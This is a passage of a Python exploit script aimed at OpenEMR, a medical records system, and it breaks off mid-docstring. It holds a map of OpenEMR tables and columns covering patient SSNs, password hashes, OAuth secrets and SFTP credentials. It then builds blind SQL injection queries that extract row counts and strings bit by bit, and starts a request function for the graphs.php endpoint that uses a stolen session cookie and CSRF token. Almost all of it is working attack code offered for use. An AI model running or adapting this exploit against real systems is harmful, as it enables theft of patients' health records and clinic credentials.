"oxygen_saturation", "oxygen_flow_rate", "external_id", "ped_weight_height", "ped_bmi", "ped_head_circ", "inhaled_oxygen_concentration", "last_updated" ], "form_vitals_calculation": [ "id", "uuid", "encounter", "pid", "date_start", "date_end", "created_at", "updated_at", "created_by", "updated_by", "calculation_id" ], "form_vitals_calculation_components": [ "id", "fvc_uuid", "vitals_column", "value", "value_string", "value_unit", "component_order" ], "form_vitals_calculation_form_vitals": [ "fvc_uuid", "vitals_id" ], "form_vital_details": [ "id", "form_id", "vitals_column", "interpretation_list_id", "interpretation_option_id", "interpretation_codes", "interpretation_title", "reason_code", "reason_description", "reason_status" ], "gacl_acl": [ "id", "section_value", "allow", "enabled", "return_value", "note", "updated_date" ], "gacl_acl_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_acl_seq": [ "id" ], "gacl_aco": [ "id", "section_value", "value", "order_value", "name", "hidden" ], "gacl_aco_map": [ "acl_id", "section_value", "value" ], "gacl_aco_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_aco_sections_seq": [ "id" ], "gacl_aco_seq": [ "id" ], "gacl_aro": [ "id", "section_value", "value", "order_value", "name", "hidden" ], "gacl_aro_groups": [ "id", "parent_id", "lft", "rgt", "name", "value" ], "gacl_aro_groups_id_seq": [ "id" ], "gacl_aro_groups_map": [ "acl_id", "group_id" ], "gacl_aro_map": [ "acl_id", "section_value", "value" ], "gacl_aro_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_aro_sections_seq": [ "id" ], "gacl_aro_seq": [ "id" ], "gacl_axo": [ "id", "section_value", "value", "order_value", "name", "hidden" ], "gacl_axo_groups": [ "id", "parent_id", "lft", "rgt", "name", "value" ], "gacl_axo_groups_map": [ "acl_id", "group_id" ], "gacl_axo_map": [ "acl_id", "section_value", "value" ], "gacl_axo_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_groups_aro_map": [ "group_id", "aro_id" ], "gacl_groups_axo_map": [ "group_id", "axo_id" ], "gacl_phpgacl": [ "name", "value" ], "globals": [ "gl_name", "gl_index", "gl_value" ], "gprelations": [ "type1", "id1", "type2", "id2" ], "groups": [ "id", "name", "user" ], "history_data": [ "id", "uuid", "coffee", "tobacco", "alcohol", "sleep_patterns", "exercise_patterns", "seatbelt_use", "counseling", "hazardous_activities", "recreational_drugs", "last_breast_exam", "last_mammogram", "last_gynocological_exam", "last_rectal_exam", "last_prostate_exam", "last_physical_exam", "last_sigmoidoscopy_colonoscopy", "last_ecg", "last_cardiac_echo", "last_retinal", "last_fluvax", "last_pneuvax", "last_ldl", "last_hemoglobin", "last_psa", "last_exam_results", "history_mother", "dc_mother", "history_father", "dc_father", "history_siblings", "dc_siblings", "history_offspring", "dc_offspring", "history_spouse", "dc_spouse", "relatives_cancer", "relatives_tuberculosis", "relatives_diabetes", "relatives_high_blood_pressure", "relatives_heart_problems", "relatives_stroke", "relatives_epilepsy", "relatives_mental_illness", "relatives_suicide", "cataract_surgery", "tonsillectomy", "cholecystestomy", "heart_surgery", "hysterectomy", "hernia_repair", "hip_replacement", "knee_replacement", "appendectomy", "date", "pid", "name_1", "value_1", "name_2", "value_2", "additional_history", "exams", "usertext11", "usertext12", "usertext13", "usertext14", "usertext15", "usertext16", "usertext17", "usertext18", "usertext19", "usertext20", "usertext21", "usertext22", "usertext23", "usertext24", "usertext25", "usertext26", "usertext27", "usertext28", "usertext29", "usertext30", "userdate11", "userdate12", "userdate13", "userdate14", "userdate15", "userarea11", "userarea12", "created_by" ], "icd10_dx_order_code": [ "dx_id", "dx_code", "formatted_dx_code", "valid_for_coding", "short_desc", "long_desc", "active", "revision" ], "icd10_gem_dx_10_9": [ "map_id", "dx_icd10_source", "dx_icd9_target", "flags", "active", "revision" ], "icd10_gem_dx_9_10": [ "map_id", "dx_icd9_source", "dx_icd10_target", "flags", "active", "revision" ], "icd10_gem_pcs_10_9": [ "map_id", "pcs_icd10_source", "pcs_icd9_target", "flags", "active", "revision" ], "icd10_gem_pcs_9_10": [ "map_id", "pcs_icd9_source", "pcs_icd10_target", "flags", "active", "revision" ], "icd10_pcs_order_code": [ "pcs_id", "pcs_code", "valid_for_coding", "short_desc", "long_desc", "active", "revision" ], "icd10_reimbr_dx_9_10": [ "map_id", "code", "code_cnt", "ICD9_01", "ICD9_02", "ICD9_03", "ICD9_04", "ICD9_05", "ICD9_06", "active", "revision" ], "icd10_reimbr_pcs_9_10": [ "map_id", "code", "code_cnt", "ICD9_01", "ICD9_02", "ICD9_03", "ICD9_04", "ICD9_05", "ICD9_06", "active", "revision" ], "icd9_dx_code": [ "dx_id", "dx_code", "formatted_dx_code", "short_desc", "long_desc", "active", "revision" ], "icd9_dx_long_code": [ "dx_id", "dx_code", "long_desc", "active", "revision" ], "icd9_sg_code": [ "sg_id", "sg_code", "formatted_sg_code", "short_desc", "long_desc", "active", "revision" ], "icd9_sg_long_code": [ "sq_id", "sg_code", "long_desc", "active", "revision" ], "immunizations": [ "id", "uuid", "patient_id", "administered_date", "immunization_id", "cvx_code", "manufacturer", "lot_number", "administered_by_id", "administered_by", "education_date", "vis_date", "note", "create_date", "update_date", "created_by", "updated_by", "amount_administered", "amount_administered_unit", "expiration_date", "route", "administration_site", "added_erroneously", "external_id", "completion_status", "information_source", "refusal_reason", "ordering_provider", "reason_code", "reason_description", "encounter_id" ], "immunization_observation": [ "imo_id", "imo_im_id", "imo_pid", "imo_criteria", "imo_criteria_value", "imo_user", "imo_code", "imo_codetext", "imo_codetype", "imo_vis_date_published", "imo_vis_date_presented", "imo_date_observation" ], "insurance_companies": [ "id", "uuid", "name", "attn", "cms_id", "ins_type_code", "x12_receiver_id", "x12_default_partner_id", "alt_cms_id", "inactive", "eligibility_id", "x12_default_eligibility_id", "cqm_sop", "date_created", "last_updated" ], "insurance_data": [ "id", "uuid", "type", "provider", "plan_name", "policy_number", "group_number", "subscriber_lname", "subscriber_mname", "subscriber_fname", "subscriber_relationship", "subscriber_ss", "subscriber_DOB", "subscriber_street", "subscriber_postal_code", "subscriber_city", "subscriber_state", "subscriber_country", "subscriber_phone", "subscriber_employer", "subscriber_employer_street", "subscriber_employer_postal_code", "subscriber_employer_state", "subscriber_employer_country", "subscriber_employer_city", "copay", "date", "pid", "subscriber_sex", "accept_assignment", "policy_type", "subscriber_street_line_2", "subscriber_employer_street_line_2", "date_end" ], "insurance_numbers": [ "id", "provider_id", "insurance_company_id", "provider_number", "rendering_provider_number", "group_number", "provider_number_type", "rendering_provider_number_type" ], "insurance_type_codes": [ "id", "type", "claim_type" ], "ip_tracking": [ "id", "ip_string", "total_ip_login_fail_counter", "ip_login_fail_counter", "ip_last_login_fail", "ip_auto_block_emailed", "ip_force_block", "ip_no_prevent_timing_attack" ], "issue_encounter": [ "id", "pid", "list_id", "encounter", "resolved", "uuid", "created_by", "updated_by", "created_at", "updated_at" ], "issue_types": [ "active", "category", "type", "plural", "singular", "abbreviation", "style", "force_show", "ordering", "aco_spec" ], "jwt_grant_history": [ "id", "jti", "client_id", "jti_exp", "creation_date" ], "keys": [ "id", "name", "value" ], "lang_constants": [ "cons_id", "constant_name" ], "lang_custom": [ "lang_description", "lang_code", "constant_name", "definition" ], "lang_definitions": [ "def_id", "cons_id", "lang_id", "definition" ], "lang_languages": [ "lang_id", "lang_code", "lang_description", "lang_is_rtl" ], "layout_group_properties": [ "grp_form_id", "grp_group_id", "grp_title", "grp_subtitle", "grp_mapping", "grp_seq", "grp_activity", "grp_repeats", "grp_columns", "grp_size", "grp_issue_type", "grp_aco_spec", "grp_save_close", "grp_init_open", "grp_referrals", "grp_unchecked", "grp_services", "grp_products", "grp_diags", "grp_last_update" ], "layout_options": [ "form_id", "field_id", "group_id", "title", "seq", "data_type", "uor", "fld_length", "max_length", "list_id", "titlecols", "datacols", "default_value", "edit_options", "description", "fld_rows", "list_backup_id", "source", "conditions", "validation", "codes" ], "lbf_data": [ "form_id", "field_id", "field_value" ], "lbt_data": [ "form_id", "field_id", "field_value" ], "lists": [ "id", "uuid", "date", "type", "subtype", "title", "udi", "udi_data", "begdate", "enddate", "returndate", "occurrence", "classification", "referredby", "extrainfo", "diagnosis", "activity", "comments", "pid", "user", "groupname", "outcome", "destination", "reinjury_id", "injury_part", "injury_type", "injury_grade", "reaction", "verification", "external_allergyid", "erx_source", "erx_uploaded", "modifydate", "severity_al", "external_id", "list_option_id" ], "lists_medication": [ "id", "list_id", "drug_dosage_instructions", "usage_category", "usage_category_title", "request_intent", "request_intent_title", "medication_adherence_information_source", "medication_adherence", "medication_adherence_date_asserted", "prescription_id", "is_primary_record", "reporting_source_record_id" ], "lists_touch": [ "pid", "type", "date" ], "list_options": [ "list_id", "option_id", "title", "seq", "is_default", "option_value", "mapping", "notes", "codes", "toggle_setting_1", "toggle_setting_2", "activity", "subtype", "edit_options", "timestamp", "last_updated" ], "log": [ "id", "date", "event", "category", "user", "groupname", "comments", "user_notes", "patient_id", "success", "checksum", "crt_user", "log_from", "menu_item_id", "ccda_doc_id" ], "login_mfa_registrations": [ "user_id", "name", "last_challenge", "method", "var1", "var2" ], "log_comment_encrypt": [ "id", "log_id", "encrypt", "checksum", "checksum_api", "version" ], "medex_icons": [ "i_UID", "msg_type", "msg_status", "i_description", "i_html", "i_blob" ], "medex_outgoing": [ "msg_uid", "msg_pid", "msg_pc_eid", "campaign_uid", "msg_date", "msg_type", "msg_reply", "msg_extra_text", "medex_uid" ], "medex_prefs": [ "MedEx_id", "ME_username", "ME_api_key", "ME_facilities", "ME_providers", "ME_hipaa_default_override", "PHONE_country_code", "MSGS_default_yes", "POSTCARDS_local", "POSTCARDS_remote", "LABELS_local", "LABELS_choice", "combine_time", "postcard_top", "status", "MedEx_lastupdated" ], "medex_recalls": [ "r_ID", "r_PRACTID", "r_pid", "r_eventDate", "r_facility", "r_provider", "r_reason", "r_created" ], "misc_address_book": [ "id", "fname", "mname", "lname", "street", "city", "state", "zip", "phone" ], "modules": [ "mod_id", "mod_name", "mod_directory", "mod_parent", "mod_type", "mod_active", "mod_ui_name", "mod_relative_link", "mod_ui_order", "mod_ui_active", "mod_description", "mod_nick_name", "mod_enc_menu", "permissions_item_table", "directory", "date", "sql_run", "type", "sql_version", "acl_version" ], "modules_hooks_settings": [ "id", "mod_id", "enabled_hooks", "attached_to" ], "modules_settings": [ "mod_id", "fld_type", "obj_name", "menu_name", "path" ], "module_acl_group_settings": [ "module_id", "group_id", "section_id", "allowed" ], "module_acl_sections": [ "section_id", "section_name", "parent_section", "section_identifier", "module_id" ], "module_acl_user_settings": [ "module_id", "user_id", "section_id", "allowed" ], "module_configuration": [ "module_config_id", "module_id", "field_name", "field_value", "created_by", "date_added", "updated_by", "date_modified", "date_created" ], "multiple_db": [ "id", "namespace", "username", "password", "dbname", "host", "port", "date" ], "notes": [ "id", "foreign_id", "note", "owner", "date", "revision" ], "notification_log": [ "iLogId", "pid", "pc_eid", "sms_gateway_type", "smsgateway_info", "message", "email_sender", "email_subject", "type", "patient_info", "pc_eventDate", "pc_endDate", "pc_startTime", "pc_endTime", "dSentDateTime" ], "notification_settings": [ "SettingsId", "Send_SMS_Before_Hours", "Send_Email_Before_Hours", "SMS_gateway_username", "SMS_gateway_password", "SMS_gateway_apikey", "type" ], "oauth_clients": [ "client_id", "client_role", "client_name", "client_secret", "registration_token", "registration_uri_path", "register_date", "revoke_date", "contacts", "redirect_uri", "grant_types", "scope", "user_id", "site_id", "is_confidential", "logout_redirect_uris", "jwks_uri", "jwks", "initiate_login_uri", "endorsements", "policy_uri", "tos_uri", "is_enabled", "skip_ehr_launch_authorization_flow", "dsi_type" ], "oauth_trusted_user": [ "id", "user_id", "client_id", "scope", "persist_login", "time", "code", "session_cache", "grant_type" ], "onetime_auth": [ "id", "pid", "create_user_id", "context", "access_count", "remote_ip", "onetime_pin", "onetime_token", "redirect_url", "expires", "date_created", "last_accessed", "scope", "profile", "onetime_actions" ], "onotes": [ "id", "date", "body", "user", "groupname", "activity" ], "onsite_documents": [ "id", "pid", "facility", "provider", "encounter", "create_date", "doc_type", "patient_signed_status", "patient_signed_time", "authorize_signed_time", "accept_signed_status", "authorizing_signator", "review_date", "denial_reason", "authorized_signature", "patient_signature", "full_document", "file_name", "file_path", "template_data" ], "onsite_mail": [ "id", "date", "owner", "user", "groupname", "activity", "authorized", "header", "title", "body", "recipient_id", "recipient_name", "sender_id", "sender_name", "assigned_to", "deleted", "delete_date", "mtype", "message_status", "mail_chain", "reply_mail_chain", "is_msg_encrypted" ], "onsite_messages": [ "id", "username", "message", "ip", "date", "sender_id", "recip_id" ], "onsite_online": [ "hash", "ip", "last_update", "username", "userid" ], "onsite_portal_activity": [ "id", "date", "patient_id", "activity", "require_audit", "pending_action", "action_taken", "status", "narrative", "table_action", "table_args", "action_user", "action_taken_time", "checksum" ], "onsite_signatures": [ "id", "status", "type", "created", "lastmod", "pid", "encounter", "user", "activity", "authorized", "signator", "sig_image", "signature", "sig_hash", "ip" ], "openemr_modules": [ "pn_id", "pn_name", "pn_type", "pn_displayname", "pn_description", "pn_regid", "pn_directory", "pn_version", "pn_admin_capable", "pn_user_capable", "pn_state" ], "openemr_module_vars": [ "pn_id", "pn_modname", "pn_name", "pn_value" ], "openemr_postcalendar_categories": [ "pc_catid", "pc_constant_id", "pc_catname", "pc_catcolor", "pc_catdesc", "pc_recurrtype", "pc_enddate", "pc_recurrspec", "pc_recurrfreq", "pc_duration", "pc_end_date_flag", "pc_end_date_type", "pc_end_date_freq", "pc_end_all_day", "pc_dailylimit", "pc_cattype", "pc_active", "pc_seq", "aco_spec", "pc_last_updated" ], "openemr_postcalendar_events": [ "pc_eid", "pc_catid", "pc_multiple", "pc_aid", "pc_pid", "pc_gid", "pc_title", "pc_time", "pc_hometext", "pc_comments", "pc_counter", "pc_topic", "pc_informant", "pc_eventDate", "pc_endDate", "pc_duration", "pc_recurrtype", "pc_recurrspec", "pc_recurrfreq", "pc_startTime", "pc_endTime", "pc_alldayevent", "pc_location", "pc_conttel", "pc_contname", "pc_contemail", "pc_website", "pc_fee", "pc_eventstatus", "pc_sharing", "pc_language", "pc_apptstatus", "pc_prefcatid", "pc_facility", "pc_sendalertsms", "pc_sendalertemail", "pc_billing_location", "pc_room", "uuid" ], "patient_access_onsite": [ "id", "pid", "portal_username", "portal_pwd", "portal_pwd_status", "portal_login_username", "portal_onetime", "date_created" ], "patient_birthday_alert": [ "pid", "user_id", "turned_off_on" ], "patient_care_experience_preferences": [ "id", "uuid", "patient_id", "observation_code", "observation_code_text", "value_type", "value_code", "value_code_system", "value_display", "value_text", "value_boolean", "effective_datetime", "status", "note" ], "patient_data": [ "id", "uuid", "title", "language", "financial", "fname", "lname", "mname", "DOB", "street", "postal_code", "city", "state", "country_code", "drivers_license", "ss", "occupation", "phone_home", "phone_biz", "phone_contact", "phone_cell", "pharmacy_id", "status", "contact_relationship", "date", "sex", "referrer", "referrerID", "providerID", "ref_providerID", "email", "email_direct", "ethnoracial", "race", "ethnicity", "religion", "interpretter", "migrantseasonal", "family_size", "monthly_income", "billing_note", "homeless", "financial_review", "pubpid", "pid", "genericname1", "genericval1", "genericname2", "genericval2", "hipaa_mail", "hipaa_voice", "hipaa_notice", "hipaa_message", "hipaa_allowsms", "hipaa_allowemail", "squad", "fitness", "referral_source", "usertext1", "usertext2", "usertext3", "usertext4", "usertext5", "usertext6", "usertext7", "usertext8", "userlist1", "userlist2", "userlist3", "userlist4", "userlist5", "userlist6", "userlist7", "pricelevel", "regdate", "contrastart", "completed_ad", "ad_reviewed", "vfc", "mothersname", "guardiansname", "allow_imm_reg_use", "allow_imm_info_share", "allow_health_info_ex", "allow_patient_portal", "deceased_date", "deceased_reason", "soap_import_status", "cmsportal_login", "care_team_provider", "care_team_facility", "care_team_status", "county", "industry", "imm_reg_status", "imm_reg_stat_effdate", "publicity_code", "publ_code_eff_date", "protect_indicator", "prot_indi_effdate", "guardianrelationship", "guardiansex", "guardianaddress", "guardiancity", "guardianstate", "guardianpostalcode", "guardiancountry", "guardianphone", "guardianworkphone", "guardianemail", "sexual_orientation", "gender_identity", "birth_fname", "birth_lname", "birth_mname", "dupscore", "name_history", "suffix", "street_line_2", "patient_groups", "prevent_portal_apps", "provider_since_date", "created_by", "updated_by", "preferred_name", "nationality_country", "last_updated", "tribal_affiliations", "sex_identified", "interpreter_needed", "advance_directive_user_authenticator" ], "patient_history": [ "id", "uuid", "date", "care_team_provider", "care_team_facility", "pid", "history_type_key", "previous_name_prefix", "previous_name_first", "previous_name_middle", "previous_name_last", "previous_name_suffix", "previous_name_enddate", "created_by" ], "patient_portal_menu": [ "patient_portal_menu_id", "patient_portal_menu_group_id", "menu_name", "menu_order", "menu_status" ], "patient_reminders": [ "id", "active", "date_inactivated", "reason_inactivated", "due_status", "pid", "category", "item", "date_created", "date_sent", "voice_status", "sms_status", "email_status", "mail_status" ], "patient_settings": [ "setting_patient", "setting_label", "setting_value" ], "patient_tracker": [ "id", "date", "apptdate", "appttime", "eid", "pid", "original_user", "encounter", "lastseq", "random_drug_test", "drug_screen_completed" ], "patient_tracker_element": [ "pt_tracker_id", "start_datetime", "room", "status", "seq", "user" ], "patient_treatment_intervention_preferences": [ "id", "uuid", "patient_id", "observation_code", "observation_code_text", "value_type", "value_code", "value_code_system", "value_display", "value_text", "value_boolean", "effective_datetime", "status", "note" ], "payments": [ "id", "pid", "dtime", "encounter", "user", "method", "source", "amount1", "amount2", "posted1", "posted2" ], "payment_gateway_details": [ "id", "service_name", "login_id", "transaction_key", "md5" ], "payment_processing_audit": [ "uuid", "service", "pid", "success", "action_name", "amount", "ticket", "transaction_id", "audit_data", "date", "map_uuid", "map_transaction_id", "reverted", "revert_action_name", "revert_transaction_id", "revert_audit_data", "revert_date" ], "person": [ "id", "uuid", "title", "first_name", "middle_name", "last_name", "preferred_name", "gender", "birth_date", "death_date", "marital_status", "race", "ethnicity", "preferred_language", "communication", "ssn", "active", "inactive_reason", "inactive_date", "notes", "created_date", "created_by", "updated_date", "updated_by" ], "person_patient_link": [ "id", "person_id", "patient_id", "linked_date", "linked_by", "link_method", "notes", "active" ], "pharmacies": [ "id", "name", "transmit_method", "email", "ncpdp", "npi" ], "phone_numbers": [ "id", "country_code", "area_code", "prefix", "number", "type", "foreign_id" ], "pnotes": [ "id", "date", "body", "pid", "user", "groupname", "activity", "authorized", "title", "assigned_to", "deleted", "message_status", "portal_relation", "is_msg_encrypted", "update_by", "update_date" ], "preference_value_sets": [ "id", "loinc_code", "answer_code", "answer_system", "answer_display", "answer_definition", "sort_order", "active" ], "prescriptions": [ "id", "uuid", "patient_id", "filled_by_id", "pharmacy_id", "date_added", "date_modified", "provider_id", "encounter", "start_date", "drug", "drug_id", "rxnorm_drugcode", "form", "dosage", "quantity", "size", "unit", "route", "interval", "substitute", "refills", "per_refill", "filled_date", "medication", "note", "active", "datetime", "user", "site", "prescriptionguid", "erx_source", "erx_uploaded", "drug_info_erx", "external_id", "end_date", "indication", "prn", "ntx", "rtx", "txDate", "usage_category", "usage_category_title", "request_intent", "request_intent_title", "drug_dosage_instructions", "created_by", "updated_by", "diagnosis" ], "prices": [ "pr_id", "pr_selector", "pr_level", "pr_price" ], "procedure_answers": [ "procedure_order_id", "procedure_order_seq", "question_code", "answer_seq", "answer", "procedure_code" ], "procedure_order": [ "procedure_order_id", "uuid", "provider_id", "patient_id", "encounter_id", "date_collected", "date_ordered", "order_priority", "order_status", "patient_instructions", "activity", "control_id", "lab_id", "specimen_type", "specimen_location", "specimen_volume", "date_transmitted", "clinical_hx", "external_id", "history_order", "order_diagnosis", "billing_type", "specimen_fasting", "order_psc", "order_abn", "collector_id", "account", "account_facility", "provider_number", "procedure_order_type", "scheduled_date", "scheduled_start", "scheduled_end", "performer_type", "order_intent", "location_id" ], "procedure_order_code": [ "procedure_order_id", "procedure_order_seq", "procedure_code", "procedure_name", "procedure_source", "diagnoses", "do_not_send", "procedure_order_title", "procedure_type", "transport", "date_end", "reason_code", "reason_description", "reason_date_low", "reason_date_high", "reason_status" ], "procedure_order_relationships": [ "id", "procedure_order_id", "resource_type", "resource_uuid", "relationship", "created_at", "created_by" ], "procedure_providers": [ "ppid", "uuid", "name", "npi", "send_app_id", "send_fac_id", "recv_app_id", "recv_fac_id", "DorP", "direction", "protocol", "remote_host", "login", "password", "orders_path", "results_path", "notes", "lab_director", "active", "type", "date_created", "last_updated" ], "procedure_questions": [ "lab_id", "procedure_code", "question_code", "seq", "question_text", "required", "maxsize", "fldtype", "options", "tips", "activity" ], "procedure_report": [ "procedure_report_id", "uuid", "procedure_order_id", "procedure_order_seq", "date_collected", "date_collected_tz", "date_report", "date_report_tz", "source", "specimen_num", "report_status", "review_status", "report_notes" ], "procedure_result": [ "procedure_result_id", "uuid", "procedure_report_id", "result_data_type", "result_code", "result_text", "date", "facility", "units", "result", "range", "abnormal", "comments", "document_id", "result_status", "date_end" ], "procedure_specimen": [ "procedure_specimen_id", "uuid", "procedure_order_id", "procedure_order_seq", "specimen_identifier", "accession_identifier", "specimen_type_code", "specimen_type", "collection_method_code", "collection_method", "specimen_location_code", "specimen_location", "collected_date", "collection_date_low", "collection_date_high", "volume_value", "volume_unit", "condition_code", "specimen_condition", "comments", "created_at", "updated_at", "created_by", "updated_by", "deleted" ], "procedure_type": [ "procedure_type_id", "parent", "name", "lab_id", "procedure_code", "procedure_type", "body_site", "specimen", "route_admin", "laterality", "description", "standard_code", "related_code", "units", "range", "seq", "activity", "notes", "transport", "procedure_type_name" ], "product_registration": [ "id", "email", "opt_out", "auth_by_id", "telemetry_disabled", "last_ask_date", "last_ask_version", "options" ], "product_warehouse": [ "pw_drug_id", "pw_warehouse", "pw_min_level", "pw_max_level" ], "pro_assessments": [ "id", "form_oid", "form_name", "user_id", "deadline", "patient_id", "assessment_oid", "status", "score", "error", "created_at", "updated_at" ], "questionnaire_repository": [ "id", "uuid", "questionnaire_id", "provider", "version", "created_date", "modified_date", "name", "type", "profile", "active", "status", "source_url", "code", "code_display", "questionnaire", "lform", "category" ], "questionnaire_response": [ "id", "uuid", "response_id", "questionnaire_foreign_id", "questionnaire_id", "questionnaire_name", "patient_id", "encounter", "audit_user_id", "creator_user_id", "create_time", "last_updated", "version", "status", "questionnaire", "questionnaire_response", "form_response", "form_score", "tscore", "error" ], "recent_patients": [ "user_id", "patients" ], "registry": [ "name", "state", "directory", "id", "sql_run", "unpackaged", "date", "priority", "category", "nickname", "patient_encounter", "therapy_group_encounter", "aco_spec", "form_foreign_id" ], "report_itemized": [ "report_id", "itemized_test_id", "numerator_label", "pass", "pid", "rule_id", "item_details" ], "report_results": [ "report_id", "field_id", "field_value" ], "rule_action": [ "id", "group_id", "category", "item" ], "rule_action_item": [ "category", "item", "clin_rem_link", "reminder_message", "custom_flag" ], "rule_filter": [ "id", "include_flag", "required_flag", "method", "method_detail", "value" ], "rule_patient_data": [ "id", "date", "pid", "category", "item", "complete", "result" ], "rule_reminder": [ "id", "method", "method_detail", "value" ], "rule_target": [ "id", "group_id", "include_flag", "required_flag", "method", "value", "interval" ], "sequences": [ "id" ], "session_tracker": [ "uuid", "created", "last_updated", "number_scripts" ], "shared_attributes": [ "pid", "encounter", "field_id", "last_update", "user_id", "field_value" ], "standardized_tables_track": [ "id", "imported_date", "name", "revision_version", "revision_date", "file_checksum" ], "supported_external_dataloads": [ "load_id", "load_type", "load_source", "load_release_date", "load_filename", "load_checksum" ], "syndromic_surveillance": [ "id", "lists_id", "submission_date", "filename" ], "template_users": [ "tu_id", "tu_user_id", "tu_facility_id", "tu_template_id", "tu_template_order" ], "therapy_groups": [ "group_id", "group_name", "group_start_date", "group_end_date", "group_type", "group_participation", "group_status", "group_notes", "group_guest_counselors" ], "therapy_groups_counselors": [ "group_id", "user_id" ], "therapy_groups_participants": [ "group_id", "pid", "group_patient_status", "group_patient_start", "group_patient_end", "group_patient_comment" ], "therapy_groups_participant_attendance": [ "form_id", "pid", "meeting_patient_comment", "meeting_patient_status" ], "track_events": [ "id", "event_type", "event_label", "event_url", "event_target", "first_event", "last_event", "label_count" ], "transactions": [ "id", "date", "title", "pid", "user", "groupname", "authorized" ], "users": [ "id", "uuid", "username", "password", "authorized", "info", "source", "fname", "mname", "lname", "suffix", "federaltaxid", "federaldrugid", "upin", "facility", "facility_id", "see_auth", "active", "npi", "title", "specialty", "billname", "email", "email_direct", "google_signin_email", "url", "assistant", "organization", "valedictory", "street", "streetb", "city", "state", "zip", "street2", "streetb2", "city2", "state2", "zip2", "phone", "fax", "phonew1", "phonew2", "phonecell", "notes", "cal_ui", "taxonomy", "calendar", "abook_type", "default_warehouse", "irnpool", "state_license_number", "weno_prov_id", "newcrop_user_role", "cpoe", "physician_type", "main_menu_role", "patient_menu_role", "portal_user", "supervisor_id", "billing_facility", "billing_facility_id", "date_created", "last_updated", "country_code", "country_code2" ], "users_facility": [ "tablename", "table_id", "facility_id", "warehouse_id" ], "users_secure": [ "id", "username", "password", "last_update_password", "last_update", "password_history1", "password_history2", "password_history3", "password_history4", "last_challenge_response", "login_work_area", "total_login_fail_counter", "login_fail_counter", "last_login_fail", "auto_block_emailed" ], "user_settings": [ "setting_user", "setting_label", "setting_value" ], "uuid_mapping": [ "id", "uuid", "resource", "resource_path", "table", "target_uuid", "created" ], "uuid_registry": [ "uuid", "table_id", "table_vertical", "couchdb", "document_drive", "mapped", "created" ], "valueset": [ "nqf_code", "code", "code_system", "code_type", "valueset", "description", "valueset_name" ], "valueset_oid": [ "nqf_code", "code", "code_system", "code_type", "valueset", "description", "valueset_name" ], "verify_email": [ "id", "pid_holder", "email", "language", "fname", "mname", "lname", "dob", "token_onetime", "active" ], "version": [ "v_major", "v_minor", "v_patch", "v_realpatch", "v_tag", "v_database", "v_acl" ], "voids": [ "void_id", "patient_id", "encounter_id", "what_voided", "date_original", "date_voided", "user_id", "amount1", "amount2", "other_info", "reason", "notes" ], "x12_partners": [ "id", "name", "id_number", "x12_sender_id", "x12_receiver_id", "processing_format", "x12_isa01", "x12_isa02", "x12_isa03", "x12_isa04", "x12_isa05", "x12_isa07", "x12_isa14", "x12_isa15", "x12_gs02", "x12_per06", "x12_dtp03", "x12_gs03", "x12_submitter_id", "x12_submitter_name", "x12_sftp_login", "x12_sftp_pass", "x12_sftp_host", "x12_sftp_port", "x12_sftp_local_dir", "x12_sftp_remote_dir", "x12_token_endpoint", "x12_eligibility_endpoint", "x12_claim_status_endpoint", "x12_attachment_endpoint", "x12_client_id", "x12_client_secret" ], "x12_remote_tracker": [ "id", "x12_partner_id", "x12_filename", "status", "claims", "messages", "created_at", "updated_at" ] } current_string_size = 0 current_line_number = 0 last_string_id = "" def _bits_to_int(bits: str) -> int: return int(bits, 2) def generate_length_bit_queries(table: str, column: str, offset: int, max_bits: int = 8): """ Generates SQL queries to extract each bit of the LENGTH(column) value. :param table: SQL table name :param column: Column name :param offset: OFFSET for LIMIT 1 :param max_bits: Number of bits to extract (default 8 for max length 255) :yield: SQL query string for each bit """ for bit in range(max_bits): div_value = 2 ** bit yield f'length {table}.{column} {offset}', ( f"(SELECT ((LENGTH({column}) DIV {div_value}) MOD 2) " f"FROM {table} " f"LIMIT 1 OFFSET {offset})" ) yield f'length {table}.{column} {offset}', None def generate_char_bit_queries(table: str, column: str, offset: int, char_position: int, bit_count: int = 8): """ Generates SQL queries to extract each bit of a character. :param table: SQL table name :param column: Column name :param offset: OFFSET for LIMIT 1 :param char_position: Character index (1-based) :param bit_count: Number of bits (default 8 for ASCII) :yield: SQL query string for each bit of the character """ for bit in range(bit_count): div_value = 2 ** bit yield f'ascii {table} {column} {offset} {char_position}', ( f"(SELECT ((ASCII(SUBSTRING({column},{char_position},1)) DIV {div_value}) MOD 2) " f"FROM {table} " f"LIMIT 1 OFFSET {offset})" ) yield f'ascii {table} {column} {offset} {char_position}', None def generate_full_string_bit_queries(table: str, column: str, offset: int, max_length_bits: int = 8, char_bit_count: int = 8): """ Generates all SQL bitwise queries to extract a full string. 1. Queries for the length (bitwise) 2. Queries for each character (bitwise) :param table: SQL table name :param column: Column name :param offset: OFFSET for LIMIT 1 :param max_length_bits: Number of bits for length (default 8) :param char_bit_count: Number of bits per character (default 8) :yield: SQL query string """ yield from generate_length_bit_queries(table, column, offset, max_bits=max_length_bits) for char_pos in range(1, current_string_size + 1): yield from generate_char_bit_queries(table, column, offset, char_pos, bit_count=char_bit_count) yield 'string', None def generate_row_count_bit_queries(table: str, max_bits: int = 16): """ Generates SQL queries to extract the number of rows in a table using a bitwise approach. Each query tests a single bit of COUNT(*). :param table: Table name :param max_bits: Number of bits to extract (default 16 for up to 65535 rows) :yield: SQL query string """ for bit in range(max_bits): div_value = 2 ** bit yield "count " + table, ( f"(SELECT ((COUNT(*) DIV {div_value}) MOD 2) " f"FROM {table})" ) yield 'count ' + table, None def generate_all_rows_multiple_columns_bit_queries(table: str, columns: list, max_rows_bits: int = 16, length_bits: int = 8, char_bits: int = 8): """ Generates all SQL bitwise queries to extract multiple columns from all rows in a table. 1. First yields queries to determine the number of rows (bitwise) 2. Then, for each row (offset), yields bitwise queries for each column. :param table: Table name :param columns: List of column names to extract :param max_rows_bits: Number of bits for row count (default 16) :param length_bits: Number of bits for length extraction per column (default 8) :param char_bits: Number of bits per character (default 8) :yield: SQL query string """ yield from generate_row_count_bit_queries(table, max_bits=max_rows_bits) for offset in range(current_line_number): for column in columns: yield from generate_full_string_bit_queries( table, column, offset, max_length_bits=length_bits, char_bit_count=char_bits ) def fetch(host, condition, cookie_value, csrf_token, resource="/library/ajax/graphs.php"): """ Perform an HTTPS POST request to the specified host with the given query parameters and OpenEMR cookie. SSL certificate verification is disabled (equivalent to curl -k). :param host: Target IP address or hostname :param cookie_value: Value of the OpenEMR session cookie :param 